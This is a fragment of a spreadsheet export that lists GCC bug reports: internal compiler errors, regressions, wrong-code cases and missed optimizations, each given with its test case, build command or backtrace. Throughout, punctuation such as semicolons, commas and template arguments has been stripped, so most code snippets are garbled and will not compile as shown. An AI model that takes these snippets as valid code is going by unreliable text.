/export/gnu/import/svn/gcc-test-ia32corei7/bld/./gcc/gcj -B/export/gnu/import/svn/gcc-test-ia32corei7/bld/i686-linux/libjava/ -B/export/gnu/import/svn/gcc-test-ia32corei7/bld/./gcc/ -B/usr/local/i686-linux/bin/ -B/usr/local/i686-linux/lib/ -isystem /usr/local/i686-linux/include -isystem /usr/local/i686-linux/sys-include -ffloat-store -fomit-frame-pointer -Usun -fclasspath= -fbootclasspath=../../../src-trunk/libjava/classpath/lib --encoding=UTF-8 -Wno-deprecated -fbootstrap-classes -g -O2 -c -fsource-filename=../../../src-trunk/libjava/java/lang/Class.java ../../../src-trunk/libjava/classpath/lib/java/lang/Class.class  -fPIC -o java/lang/.libs/Class.o
jc1: internal compiler error: in assemble_external at varasm.c:2179
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-37394</t>
  </si>
  <si>
    <t>[4.4 Regression] Segfault in ia64_variable_issue with -O -fschedule-insns2</t>
  </si>
  <si>
    <t>With -O -fschedule-insns2 on current trunk (r140054):
(sid)tbm@coconut0:~$ /usr/lib/gcc-snapshot/bin/gcc -O -fschedule-insns2  pfstmo_drago03.ii
In file included from /usr/include/pfs-1.2/pfs.h:46
                 from pfstmo_drago03.cpp:41:
/usr/include/pfs-1.2/array2d.h: In destructor 'virtual pfs::Array2D::~Array2D()':
/usr/include/pfs-1.2/array2d.h:141: internal compiler error: Segmentation fault
Please submit a full bug report</t>
  </si>
  <si>
    <t>GCC-45534</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE in refs_may_alias_p_1 at tree-ssa-alias.c:1031</t>
  </si>
  <si>
    <t>From revisions 163847 (163744 works) to 163859 I see the following ICEs
with both -m32 and -m64
libgomp.graphite/force-parallel-3.c:5:6: internal compiler error: in refs_may_alias_p_1 at tree-ssa-alias.c:1031
libgomp.graphite/force-parallel-9.c:5:6: internal compiler error: in refs_may_alias_p_1 at tree-ssa-alias.c:1031
with -m64 -Os
gfortran.dg/backspace_1.f:82:0: internal compiler error: in refs_may_alias_p_1 at tree-ssa-alias.c:1031
gfortran.dg/record_marker_2.f:83:0: internal compiler error: in refs_may_alias_p_1 at tree-ssa-alias.c:1031
libgomp.fortran/appendix-a/a.16.1.f90:26:0: internal compiler error: in refs_may_alias_p_1 at tree-ssa-alias.c:1031
libgomp.fortran/omp_atomic2.f90:35:0: internal compiler error: in refs_may_alias_p_1 at tree-ssa-alias.c:1031
and with -m64 -O2 -fgraphite-identity
gfortran.dg/graphite/pr42393-1.f90:6:0: internal compiler error: in refs_may_alias_p_1 at tree-ssa-alias.c:1031</t>
  </si>
  <si>
    <t>GCC-80831</t>
  </si>
  <si>
    <t>[6/7/8 Regression] ICE: Segmentation fault with -fsyntax-only</t>
  </si>
  <si>
    <t>Following code throws internal compiler error: Segmentation fault with
g++ -c t.cpp --std=c++11 -fsyntax-only
(gcc Releases 6 and 7 gcc 5 is ok)
class A
{
public:
    virtual ~A() { }
}
class B { }
class C : public A { }
template
class D : public C
{
public:
    D() { }
    ~D() { }
}
class E
{
public:
    static E
    B q()
    template
    B q(void (J::*r)())
    {
        new D()
        return q()
    }
}
void t()
{
  class F
  {
  public:
    virtual void s() { }
  }
  E
  B y = x.q(
}
$ g++ -c t.cpp --std=c++11 -fsyntax-only
t.cpp:41:1: internal compiler error: Segmentation fault
 }
 ^
0xb045cf crash_signal
	/gcc/gnu/gcc-7-branch/gcc/gcc/toplev.c:337
0x642c4c c_parse_final_cleanups()
	/gcc/gnu/gcc-7-branch/gcc/gcc/cp/decl2.c:4710
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-69264</t>
  </si>
  <si>
    <t>[5 regression] ICE building spidermonkey -mcpu=970 -maltivec -O3: rs6000_builtin_vectorization_cost at config/rs6000/rs6000.c:4350</t>
  </si>
  <si>
    <t>Created attachment 37334
reduced testcase
building spidermonkey on ppc64 w/-maltivec -O3 fails starting w/gcc-4.9:
powerpc64-unknown-linux-gnu-g++ -o jsxml.o -c  -fvisibility=hidden -DOSTYPE=\Linux4.1\ -DOSARCH=Linux -DEXPORT_JS_API -D__STDC_LIMIT_MACROS  -I. -I. -I./dist/include -I./dist/include/nsprpub  -I/usr/include/nspr   -I. -I./assembler -I./yarr  -fPIC  -fno-rtti -fno-exceptions -Wall -Wpointer-arith -Woverloaded-virtual -Wsynth -Wno-ctor-dtor-privacy -Wno-non-virtual-dtor -Wcast-align -Wno-invalid-offsetof -Wno-variadic-macros -Werror=return-type -pedantic -Wno-long-long -mcpu=970 -mtune=970 -O2 -maltivec -mabi=altivec -pipe -fno-strict-aliasing -pthread -pipe  -DNDEBUG -DTRIMMED -O3 -fstrict-aliasing -fomit-frame-pointer -DUSE_SYSTEM_MALLOC=1 -DENABLE_ASSEMBLER=1 -DENABLE_JIT=1   -DMOZILLA_CLIENT -include ./js-confdefs.h -MD -MF .deps/jsxml.pp jsxml.cpp
...
internal compiler error: in rs6000_builtin_vectorization_cost at config/rs6000/rs6000.c:4350
...
reduced test case is attached.  ICE is observed with 4.9.3 &amp; 5.3.0.  4.8.5 works fine though.
$ powerpc64-unknown-linux-gnu-g++-4.9.3 -O3 -maltivec -c jsxml.ii
jsxml.ii: In function â€˜void xml_defineProperty(JSContext* int const Value*)â€™:
jsxml.ii:74:6: internal compiler error: in rs6000_builtin_vectorization_cost at config/rs6000/rs6000.c:4350
 void xml_defineProperty(JSContext *cx int id const Value *v)
      ^</t>
  </si>
  <si>
    <t>GCC-61583</t>
  </si>
  <si>
    <t>[4.9/4.10 regression] stage2 and stage3 compare failure due to value range loss</t>
  </si>
  <si>
    <t>Seen first on ibm-4.9 branch with powerpc64 but also occurs on 4.9 branch with both powerpc64 and x86_64.  x86_64 configured with --enable-threads=posix --disable-shared --disable-libmudflap --disable-libssp --disable-lto --disable-libgomp --without-ppl --without-cloog --disable-checking --enable-languages=cc++
results for revision 211867 x86_64 as follows powerpc64 doesn't hit the builtins.o fail.  Note that --disable-checking seems necessary.
Bootstrap comparison failure!
gcc/tree-vect-stmts.o differs
gcc/builtins.o differs
gcc/tree-vect-loop.o differs
Disassembling tree-vect-stmts.o shows loop exit branches differ for
      for (j = 0 j &lt; ncopies ++j)
in vectorizable_mask_load_store.
ivopts details dump differences (- no debug + debug):
@@ -1622010 +1917311 @@
 Analyzing # of iterations of loop 1
   exit condition [1 +  1](no_overflow) &lt; ncopies_19
-  bounds on difference of bases: 0 ... 2147483646
+  bounds on difference of bases: -2147483649 ... 2147483646
   result:
+    zero if ncopies_19 &lt;= 0
     # of iterations (unsigned int) ncopies_19 + 4294967295 bounded by 2147483646
-  number of iterations (unsigned int) ncopies_19 + 4294967295
+  number of iterations (unsigned int) ncopies_19 + 4294967295 zero if ncopies_19 &lt;= 0
 Induction variables:
@@ -163347 +192887 @@
   0    0       0       1
   1    0       0       1
   2    0       0       1
-  3    0       0       1
+  3    4       1       1
 Use 2:
   cand cost    compl.  depends on
@@ -1642818 +1938217 @@
   base 0
   step 1
-Replacing exit test: if (ncopies_19 &gt; j_153)
 bool vectorizable_assignment(gimple gimple_stmt_iterator* gimple_statement_base** slp_tree) (struct gimple_statement_base * stmt
 {
[snip]
So there's why the exit test changes with no debug output the exit test is
if (ncopies_19 != j_153) with debug info you keep the original test.
A gdb session shows that ncopies_19 has NULL SSA_NAME_RANGE_INFO during ivopts with -g but does have SSA_NAME_RANGE_INFO without -g which agrees with the dump output above.</t>
  </si>
  <si>
    <t>GCC-55127</t>
  </si>
  <si>
    <t>[4.8 regression] Incorrect dependent scope error with partial specialization of non-type parameter</t>
  </si>
  <si>
    <t>The current GCC snapshot in Debian unstable seems to reject valid code (mininal test case attached).
In a template function context accessing a nested type of a template instantiation of an unrelated(!) template class may be flagged as requiring a 'typename' for being a dependent scope.
AFAICS it only happens in case of the instantiated template being partially specialised for a non-type template parameter like bool here:
struct some_class
{
  static const bool     is_valid_type = true
}
template&lt; typename Type
         bool Valid = Type::is_valid_type &gt;
struct wrapper
template
struct wrapper { ... }
template
int fun()
{
  wrapper::type x // fails w/ 4.8.0
}
$ g++-snapshot -c  -o typename-bug.o typename-bug.cpp
typename-bug.cpp: In function 'void fun()':
typename-bug.cpp:29:3: error: need 'typename' before 'wrapper::type' because 'wrapper' is a dependent scope
   wrapper::type x
   ^
typename-bug.cpp:29:29: error: expected '' before 'x'
   wrapper::type x
                             ^
typename-bug.cpp: In instantiation of 'void fun() [with T = int]':
typename-bug.cpp:34:12:   required from here
typename-bug.cpp:29:3: error: dependent-name 'wrapper::type' is parsed as a non-type but instantiation yields a type
   wrapper::type x
   ^
typename-bug.cpp:29:3: note: say 'typename wrapper::type' if a type is meant
A possible workaround is to partially specialise via a type parameter (as shown in the attached file with WORKAROUND being defined).
The failing GCC version reports:
Using built-in specs.
COLLECT_GCC=g++-snapshot
COLLECT_LTO_WRAPPER=/usr/lib/gcc-snapshot/libexec/gcc/i486-linux-gnu/4.8.0/lto-wrapper
Target: i486-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 20121008-1' --with-bugurl=file:///usr/share/doc/gcc-snapshot/README.Bugs --enable-languages=cadac++javagofortranobjcobj-c++ --prefix=/usr/lib/gcc-snapshot --enable-shared --enable-linker-build-id --with-system-zlib --disable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --enable-plugin --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-4.8-snap/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-4.8-snap --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-4.8-snap --with-arch-directory=i386 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-targets=all --with-arch-32=i586 --with-tune=generic --disable-werror --enable-checking=yes --build=i486-linux-gnu --host=i486-linux-gnu --target=i486-linux-gnu
Thread model: posix
gcc version 4.8.0 20121008 (experimental) [trunk revision 192192] (Debian 20121008-1) 
Code is accepted by all other GCC variants in Debian testing/unstable:
Using built-in specs.
Target: i486-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 4.4.7-3' --with-bugurl=file:///usr/share/doc/gcc-4.4/README.Bugs --enable-languages=cc++fortran --prefix=/usr --program-suffix=-4.4 --enable-shared --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.4 --libdir=/usr/lib --enable-nls --enable-clocale=gnu --enable-libstdcxx-debug --enable-targets=all --with-arch-32=i586 --with-tune=generic --enable-checking=release --build=i486-linux-gnu --host=i486-linux-gnu --target=i486-linux-gnu
Thread model: posix
gcc version 4.4.7 (Debian 4.4.7-3) 
Using built-in specs.
COLLECT_GCC=g++-4.6
COLLECT_LTO_WRAPPER=/usr/lib/gcc/i486-linux-gnu/4.6/lto-wrapper
Target: i486-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 4.6.3-12' --with-bugurl=file:///usr/share/doc/gcc-4.6/README.Bugs --enable-languages=cc++fortranobjcobj-c++ --prefix=/usr --program-suffix=-4.6 --enable-shared --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.6 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --enable-plugin --enable-objc-gc --enable-targets=all --with-arch-32=i586 --with-tune=generic --enable-checking=release --build=i486-linux-gnu --host=i486-linux-gnu --target=i486-linux-gnu
Thread model: posix
gcc version 4.6.3 (Debian 4.6.3-12) 
Using built-in specs.
COLLECT_GCC=g++-4.7
COLLECT_LTO_WRAPPER=/usr/lib/gcc/i486-linux-gnu/4.7/lto-wrapper
Target: i486-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 4.7.2-4' --with-bugurl=file:///usr/share/doc/gcc-4.7/README.Bugs --enable-languages=cc++gofortranobjcobj-c++ --prefix=/usr --program-suffix=-4.7 --enable-shared --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.7 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --enable-plugin --enable-objc-gc --enable-targets=all --with-arch-32=i586 --with-tune=generic --enable-checking=release --build=i486-linux-gnu --host=i486-linux-gnu --target=i486-linux-gnu
Thread model: posix
gcc version 4.7.2 (Debian 4.7.2-4)</t>
  </si>
  <si>
    <t>gccbugs</t>
  </si>
  <si>
    <t>GCC-1509</t>
  </si>
  <si>
    <t>compiler internal error on function template parameter</t>
  </si>
  <si>
    <t>/tmp/@30152.7.cc: In function `int main()':
/tmp/@30152.7.cc:15: Internal compiler error in convert_nontype_argument at 
cp/pt.c:3096
Release:
gcc version 2.97 20001224 (experimental)
Environment:
CodeSourcery's Online Test Compilation
How-To-Repeat:
template
struct A {
  typedef int F()
}
template::F f&gt;
//template
struct B {
  static int g() { return f() }
}
int f() { return 0 }
int main() {
  return B&lt;int
}</t>
  </si>
  <si>
    <t>GCC-69848</t>
  </si>
  <si>
    <t>poor vectorization of a loop from SPEC2006 464.h264ref</t>
  </si>
  <si>
    <t>This is a continuation of bug 69282 which reported an ICE on the same loop which has since been fixed.  There is still the problem that the code is poorly optimized.  These problems can be seen on both armhf and aarch64.  There are multiple problems here.
The testcase is
#include 
int fn1 (int) __attribute__ ((noinline))
int a[32]
int fn1(int d) {
  int c = 1
  for (int b = 0 b &lt; 32 b++)
    if (a[b])
      c = 0
  return c
}
int
main (void)
{
  int i
  for (i = 0 i &lt; 32 i++)
    a[i] = 0
  if (fn1(10) != 1)
    abort ()
  a[3] = 2
  a[24] = 1
  if (fn1(10) != 0)
    abort ()
  return 0
}
Compiled with -O2 -ftree-vectorize the inner loop of fn1 is
.L2:
        ldr     q0 [x0 x1]
        add     x0 x0 16
        cmp     x0 128
        cmeq    v0.4s v0.4s #0
        not     v0.16b v0.16b
        cmlt    v0.4s v0.4s #0
        bit     v1.16b v2.16b v0.16b
        bic     v3.16b v3.16b v0.16b
        add     v2.4s v2.4s v4.4s
        bne     .L2
The cmlt instruction serves no useful purpose as the output is the same as the input.  This can be fixed by adding the missing vcond_mask* patterns to the armhf and aarch64 ports.
The not instruction is unnecessary.  It can be eliminated by changing the bit/bic instructions into bif/and.  This might be possible via combine and might require rewriting some aarch64/armhf patterns to use vector rtl instead of unspecs.
The v2 iterator is computing the index in the array as a vector which is info we don't need.  We only need the info in v3.  We can eliminate the instructions setting v1 and v2 plus the instructions before the loop setting v1 v2 and v4 and the instructions after the loop using v1.
Also related to that after the loop we have two reductions.
        umaxv   s0 v1.4s
        dup     v0.4s v0.s[0]
        cmeq    v1.4s v1.4s v0.4s
        and     v1.16b v3.16b v1.16b
        umaxv   s1 v1.4s
        umov    w0 v1.s[0]
We only need one reduction here and we only need the info in v3.  This can be simplified to
        uminv   s1 v3.4s
        umov    w0 v1.s[0]
I don't know offhand what vectorizer changes are necessary to make these last two transformations.
I verified that these transformations work on aarch64.  Before the transformations we have 8 instructions before the loop 10 instructions inside the loop and 6 instructions after the loop.  After the transformations we have 4 instructions before the loop 6 instructions inside the loop and 2 instructions after the loop.  So it is half the size statically and roughly 60% of the original size dynamically.</t>
  </si>
  <si>
    <t>GCC-23985</t>
  </si>
  <si>
    <t>[3.4 regression] Memory aliasing information incorrect in inlined memcpy</t>
  </si>
  <si>
    <t>GCC 3.4.3 and 3.4.4 generated wrong code at -O2 and -Os opt level for the
attached testcase. If I user -O1 the test case works fine.
Secondly it also works fine if I specify -O2 -fno-if-convertion2
Thirdly If I comment out
newinfo-&gt;fig-&gt;shape = *
line in the testcase it works fine agains.
The testcase can be compile and linked and runtime outputs should match
correct output should be 1
alpha.style = 1
correct output should be 2
alpha.style = 2
in wrong code case. It prints.
correct output should be 1
alpha.style = 254
correct output should be 2
alpha.style = 2
The testcase works fine with GCC 4.0 and CVS Trunk GCC</t>
  </si>
  <si>
    <t>GCC-52699</t>
  </si>
  <si>
    <t>infinite loop generated with -O0</t>
  </si>
  <si>
    <t>jarro.2783</t>
  </si>
  <si>
    <t>GCC-52402</t>
  </si>
  <si>
    <t>IPA-SRA creates aligned loads from unaligned memory</t>
  </si>
  <si>
    <t>The following segfaults at -O2
typedef int v4si __attribute__((vector_size(16)))
struct T { v4si i[2] int j }
static v4si __attribute__((noinline))
foo (struct T t)
{
  return t.i[0]
}
static struct T *__attribute__((noinline))
init ()
{
  char *p = __builtin_malloc (sizeof (struct T) + 1)
  p++
  __builtin_memset (p 1 sizeof (struct T))
  return (struct T *)p
}
int main()
{
  struct T *p
  p = init ()
  if (foo (*p)[0] != 0x01010101)
    __builtin_abort ()
  return 0
}
this is because ipa-prop.c:ipa_modify_call_arguments blindly loads
from *p as if it were properly aligned.</t>
  </si>
  <si>
    <t>GCC-5424</t>
  </si>
  <si>
    <t>std::ifstream::operator&gt;&gt;(int&amp;) fails with negative hex numbers</t>
  </si>
  <si>
    <t xml:space="preserve">	Any negative int written to a file with std::ofstream::operator&lt;&lt;(int
	const&amp;) and std::ios::hex as basefield is written in the
	complementary notation (-1 becomes ffffffff). When
	std::ifstream::operator&gt;&gt;(int&amp;) tries to read that number
	again the failbit gets set. This work finely under g++ &lt; v3
	Sun Forte C++ Borland's BCB5 and others.
Release:
3.0.3
Environment:
System: Linux klservedv 2.4.9-13smp #1 SMP Tue Oct 30 19:57:16 EST 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../configure --enable-exceptions --enable-threads
How-To-Repeat:
	Write -1 to an ofstream in hex basefield mode and
	try to read it in again in hex basefield mode using
	std::ifstream</t>
  </si>
  <si>
    <t>doerntge</t>
  </si>
  <si>
    <t>GCC-2299</t>
  </si>
  <si>
    <t>Use of += for String arrays produces Segfault during compilation</t>
  </si>
  <si>
    <t xml:space="preserve">	The += operator for string arrays does not work. 
        It works for strings.
        s[0] = s[0] + string works too though this should be equivalent to s[0] += string
        This error report is meant to replace the report
        java/2008: ICE in gcj (no optimization) 
        because it is a much simpler testcase.
        Sorry i don't know how to do that myself.
Release:
3.0 20010312 (prerelease)
Environment:
System: Linux keksy 2.2.18 #5 SMP Wed Jan 24 09:24:42 CET 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../configure --prefix=/sw/gcc-3 --enable-languages=c++f77java --enable-threads=posix
How-To-Repeat:
cat buggy.java
public class buggy
{
 public static void main(String[] args)
    {
     String s[] = new String[1]
     s[0] =  
     s[0] += 
    }
}
gcj -c buggy.java
buggy.java: In class `buggy':
buggy.java: In method `buggy.main(java.lang.String[])':
buggy.java:8: Internal error: Segmentation fault
Please submit a full bug report with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>martin.kahlert</t>
  </si>
  <si>
    <t>GCC-4554</t>
  </si>
  <si>
    <t>Simple compile error under Solaris 8 works fine under Solaris 2.6</t>
  </si>
  <si>
    <t>When compile for Solaris 8 this happens:
dg.exp          ..linked
libstdc++.tests         ..working in
printnow.c              ..linked
testsuite_hooks.h               ..linked
testsuite_flags.in              ..linked
creating cache ../config.cache
configure: error: can not find install-sh or install.sh in . ./.. ./../..
make: *** [configure-target-libstdc++-v3] Error 1
Release:
gcc-3.01 (still exists in latest CVS snapshot)
Environment:
automake 1.4 autoconf 2.13 make 3.79
How-To-Repeat:
It does it everytime I compile it! Running Solaris 8 on an Ultra 60.</t>
  </si>
  <si>
    <t>rhfreeman</t>
  </si>
  <si>
    <t>GCC-8821</t>
  </si>
  <si>
    <t>gcc 3.2 problem with overloaded inherited operator</t>
  </si>
  <si>
    <t>A operator with a user class from a base class A will not 
be found if a derived class B overloads this operator.
&gt; g++ tst.cpp
tst.cpp: In function `int main(int char**)':
tst.cpp:16: no match for `B&amp; &lt;&lt; Z&amp;' operator
tst.cpp:10: candidates are: void B::operator&lt;&lt;(int)
Release:
gcc version 3.2
Environment:
Linux version 2.4.19-4GB
How-To-Repeat:
class Z {   }
class A  {
public:
    void operator &lt;&lt; ( const Z  &amp; ) { }
}
class B : public A {
public:
    void operator &lt;&lt; ( int ) {  }
} 
int main( int  char ** ) {
    B   b
    Z   z
    b &lt;&lt; z     // Oops!? Why is it not possible to compile this?
    return 0
}</t>
  </si>
  <si>
    <t>andre</t>
  </si>
  <si>
    <t>GCC-18545</t>
  </si>
  <si>
    <t>[3.4 regression] ICE when returning undefined type</t>
  </si>
  <si>
    <t>The following invalid code snippet crashes the C++ frontend:
===================================================
struct A
A foo()
{
    A a
    return a
}
===================================================
bug.cc: In function 'A foo()':
bug.cc:7: error: return type 'struct A' is incomplete
bug.cc:9: error: aggregate 'A a' has incomplete type and cannot be defined
bug.cc:10: internal compiler error: tree check: expected class 'type' have
'exceptional' (error_mark) in check_return_expr at cp/typeck.c:6296
Please submit a full bug report [etc.]
The bug is present since gcc 3.4.0.
Looks like it was introduced with the new parser:
: Search converges between 2002-12-14-trunk (#159) and 2002-12-29-trunk (#160).</t>
  </si>
  <si>
    <t>GCC-48168</t>
  </si>
  <si>
    <t>[4.7 regression] Solaris 2/SPARC bootstrap broken: ICE in sparc_function_arg_1 at config/sparc/sparc.c:5721</t>
  </si>
  <si>
    <t>Created attachment 23692
preprocessed input file
Within the last two days Solaris 2/SPARC got broken: cc1plus ICEs building the
64-bit streambuf-inst.lo:
$ /var/gcc/regression/trunk/11-gcc/build/./gcc/xgcc -shared-libgcc -B/var/gcc/regression/trunk/11-gcc/build/./gcc -nostdinc++ -L/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/sparcv9/libstdc++-v3/src -L/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/sparcv9/libstdc++-v3/src/.libs -B/vol/gcc/sparc-sun-solaris2.11/bin/ -B/vol/gcc/sparc-sun-solaris2.11/lib/ -isystem /vol/gcc/sparc-sun-solaris2.11/include -isystem /vol/gcc/sparc-sun-solaris2.11/sys-include -m64 -I/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/sparcv9/libstdc++-v3/include/sparc-sun-solaris2.11 -I/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/sparcv9/libstdc++-v3/include -I/vol/gcc/src/hg/trunk/local/libstdc++-v3/libsupc++ -fno-implicit-templates -Wall -Wextra -Wwrite-strings -Wcast-qual -fdiagnostics-show-location=once -ffunction-sections -fdata-sections -g -O2 -m64 -c /vol/gcc/src/hg/trunk/local/libstdc++-v3/src/streambuf-inst.cc  -fPIC -DPIC -o .libs/streambuf-inst.o -save-temps
In file included from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/sparcv9/libstdc++-v3/include/ios:44:0
                 from /vol/gcc/src/hg/trunk/local/libstdc++-v3/src/streambuf-inst.cc:30:
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/sparcv9/libstdc++-v3/include/streambuf: In member function 'std::basic_streambuf::pos_type std::basic_streambuf::pubseekpos(std::basic_streambuf::pos_type std::ios_base::openmode) [with _CharT = char _Traits = std::char_traits std::basic_streambuf::pos_type = std::fpos std::ios_base::openmode = std::_Ios_Openmode]':
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/sparcv9/libstdc++-v3/include/streambuf:248:45: internal compiler error: in sparc_function_arg_1 at config/sparc/sparc.c:5721
Can be reduced to
$ ./cc1plus streambuf-inst.ii -mptr64 -mstack-bias -mno-v8plus -mcpu=v9 -quiet -m64 -g -O2
In file included from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/sparcv9/libstdc++-v3/include/ios:44:0
                 from /vol/gcc/src/hg/trunk/local/libstdc++-v3/src/streambuf-inst.cc:30:
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/sparcv9/libstdc++-v3/include/streambuf: In member function 'std::basic_streambuf::pos_type std::basic_streambuf::pubseekpos(std::basic_streambuf::pos_type std::ios_base::openmode) [with _CharT = char _Traits = std::char_traits std::basic_streambuf::pos_type = std::fpos std::ios_base::openmode = std::_Ios_Openmode]':
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/sparcv9/libstdc++-v3/include/streambuf:248:45: internal compiler error: in sparc_function_arg_1 at config/sparc/sparc.c:5721
The stack trace is
(gdb) where
#0  fancy_abort (file=0xa8a790 /vol/gcc/src/hg/trunk/local/gcc/config/sparc/sparc.c line=5721 function=0xa8c118 sparc_function_arg_1) at /vol/gcc/src/hg/trunk/local/gcc/diagnostic.c:893
#1  0x007c5a08 in sparc_function_arg_1 (cum=0xffbfeee4 mode=BLKmode type=0xff030480 named=1 '\001' incoming_p=0 '\000') at /vol/gcc/src/hg/trunk/local/gcc/config/sparc/sparc.c:5721
#2  0x007a1580 in prepare_call_arguments () at /vol/gcc/src/hg/trunk/local/gcc/var-tracking.c:5736
#3  vt_initialize () at /vol/gcc/src/hg/trunk/local/gcc/var-tracking.c:8785
#4  0x007a81d8 in variable_tracking_main_1 () at /vol/gcc/src/hg/trunk/local/gcc/var-tracking.c:8939
#5  variable_tracking_main () at /vol/gcc/src/hg/trunk/local/gcc/var-tracking.c:8991
#6  0x0051bc5c in execute_one_pass (pass=0xadb758) at /vol/gcc/src/hg/trunk/local/gcc/passes.c:1556
#7  0x0051bfb8 in execute_pass_list (pass=0xadb758) at /vol/gcc/src/hg/trunk/local/gcc/passes.c:1611
#8  0x0051bfdc in execute_pass_list (pass=0xad9b98) at /vol/gcc/src/hg/trunk/local/gcc/passes.c:1612
#9  0x0051bfdc in execute_pass_list (pass=0xad9bcc) at /vol/gcc/src/hg/trunk/local/gcc/passes.c:1612
#10 0x0063a024 in tree_rest_of_compilation (fndecl=0xfe530800) at /vol/gcc/src/hg/trunk/local/gcc/tree-optimize.c:422
#11 0x007db700 in cgraph_expand_function (node=Unhandled dwarf expression opcode 0xf3
) at /vol/gcc/src/hg/trunk/local/gcc/cgraphunit.c:1576
#12 0x007de178 in cgraph_expand_all_functions () at /vol/gcc/src/hg/trunk/local/gcc/cgraphunit.c:1635
#13 cgraph_optimize () at /vol/gcc/src/hg/trunk/local/gcc/cgraphunit.c:1899
#14 0x007de760 in cgraph_finalize_compilation_unit () at /vol/gcc/src/hg/trunk/local/gcc/cgraphunit.c:1096
#15 0x001918e0 in cp_write_global_declarations () at /vol/gcc/src/hg/trunk/local/gcc/cp/decl2.c:4000
#16 0x005d8ffc in compile_file (argc=10 argv=0xffbff444) at /vol/gcc/src/hg/trunk/local/gcc/toplev.c:591
#17 do_compile (argc=10 argv=0xffbff444) at /vol/gcc/src/hg/trunk/local/gcc/toplev.c:1900
#18 toplev_main (argc=10 argv=0xffbff444) at /vol/gcc/src/hg/trunk/local/gcc/toplev.c:1963
#19 0x000c2804 in _start ()
Maybe this indicates that Jakub's recent patch
2011-03-16  Jakub Jelinek  
	* emit-rtl.c (try_split): Don't call copy_call_info debug hook.
	* calls.c: Remove debug.h include.
	(emit_call_1): Don't call virtual_call_token debug hook.
Is the culprit?</t>
  </si>
  <si>
    <t>GCC-13372</t>
  </si>
  <si>
    <t>ICE in trans-types.c (gfc_typenode_for_spec) see #13201</t>
  </si>
  <si>
    <t>ice-on-valid-code
GCC configuration:
  /gcc/configure --enable-languages=cf95 --enable-threads=posix             
--disable-libmudflap
Thread model: posix
gcc version 3.5-tree-ssa 20031127 (merged 20031123)
 /usr/local/libexec/gcc/powerpc-apple-darwin7.0.0/3.5-tree-ssa/f951 
typeSizes.f90 -fPIC -quiet -dumpbase typeSizes.f90 -auxbase typeSizes -version
-o typeSizes.s
GNU F95 version 3.5-tree-ssa 20031127 (merged 20031123) (powerpc-apple-darwin7.0.0)
        compiled by GNU C version 3.5-tree-ssa 20031127 (merged 20031123).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
typeSizes.f90:0: internal compiler error: in gfc_typenode_for_spec at
fortran/trans-types.c:307</t>
  </si>
  <si>
    <t>c.lemmen</t>
  </si>
  <si>
    <t>GCC-38466</t>
  </si>
  <si>
    <t>Document std::pair vs. std::swap</t>
  </si>
  <si>
    <t>Sorting a std::vector &gt; is very slow because std::swap is not used for switching strings. 
std::swap for every std::pair should use two std::swap for the components of the pair.
The following test program shows that this is currently not the case:
#include 
#include 
#include 
class A {
public:
   A(int a) : val(a) { std::cout &lt;&lt; Constructing with:  &lt;&lt; a &lt;&lt; \n }
   A(A const  }
   A  std::cout &lt;&lt; Assignment from:  &lt;&lt; a.val &lt;&lt; \n return *this }
   ~A() { std::cout &lt;&lt; Destructing  &lt;&lt; val &lt;&lt; \n}
public:
   int val
}
namespace std {
void swap(A &amp; a A &amp; b) {
   std::cout &lt;&lt; SWapping:  &lt;&lt; a.val &lt;&lt; / &lt;&lt; b.val &lt;&lt; \n
   std::swap(a b)
}
}
int main() {
   std::pair f(A(10) 2)
   std::pair s(A(20) 3)
   std::swap(f s)
}</t>
  </si>
  <si>
    <t>GCC-59369</t>
  </si>
  <si>
    <t>c-c++-common/asan/pr59063-[12].c fails on darwin</t>
  </si>
  <si>
    <t>The new c-c++-common/asan/pr59063-1.c and c-c++-common/asan/pr59063-2.c test cases fail at all optimization levels on x86_64-apple-darwin13 due to the absence of monotonic clock support or librt on darwin. The failures are of the form...
